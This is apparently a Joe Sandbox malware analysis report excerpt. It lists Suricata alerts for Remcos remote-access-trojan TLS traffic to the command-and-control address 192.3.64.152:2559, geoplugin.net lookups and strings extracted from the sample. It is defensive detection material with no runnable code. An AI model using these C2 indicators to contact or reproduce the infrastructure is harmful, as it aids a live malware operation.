                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49754 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49744 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49732 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49747 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49755 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49756 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49748 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49760 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49759 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49745 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49746 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49798 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49770 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49809 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49819 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49749 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49875 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49753 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49847 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49830 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49858 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49866 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49743 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49836 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50038 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50041 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50042 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50044 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50050 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50040 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50055 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50049 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50045 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50043 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50053 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50057 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50064 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50063 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50059 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50073 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50071 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50056 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50075 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50068 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50078 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50074 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50051 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50047 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50079 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50090 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50095 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50077 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50092 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50076 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50100 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50104 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50105 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50085 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50066 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50062 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50093 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50082 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50084 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50060 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50098 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50086 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50052 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50083 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50096 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50048 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50106 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50039 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50054 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50061 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50089 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50058 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50091 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50102 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50067 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50070 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50099 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50065 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50109 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50094 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50081 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50116 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50114 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50119 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50088 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50111 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50122 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50120 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50110 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50069 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50123 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50087 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50113 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50107 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50046 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50108 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50072 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50118 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50080 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50117 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50103 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50112 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50115 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50097 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50101 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50121 -> 192.3.64.152:2559
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 192.3.64.152
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewIP Address: 192.3.64.152 192.3.64.152
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49734 -> 178.237.33.50:80
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49891 -> 178.237.33.50:80
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49758
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49737
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_0041B411
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: 6Ctc0o7vhqKgjU7.exe, 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.000000000120A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.00000000011D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gppW#
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719025391.0000000005960000.00000004.00000020.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

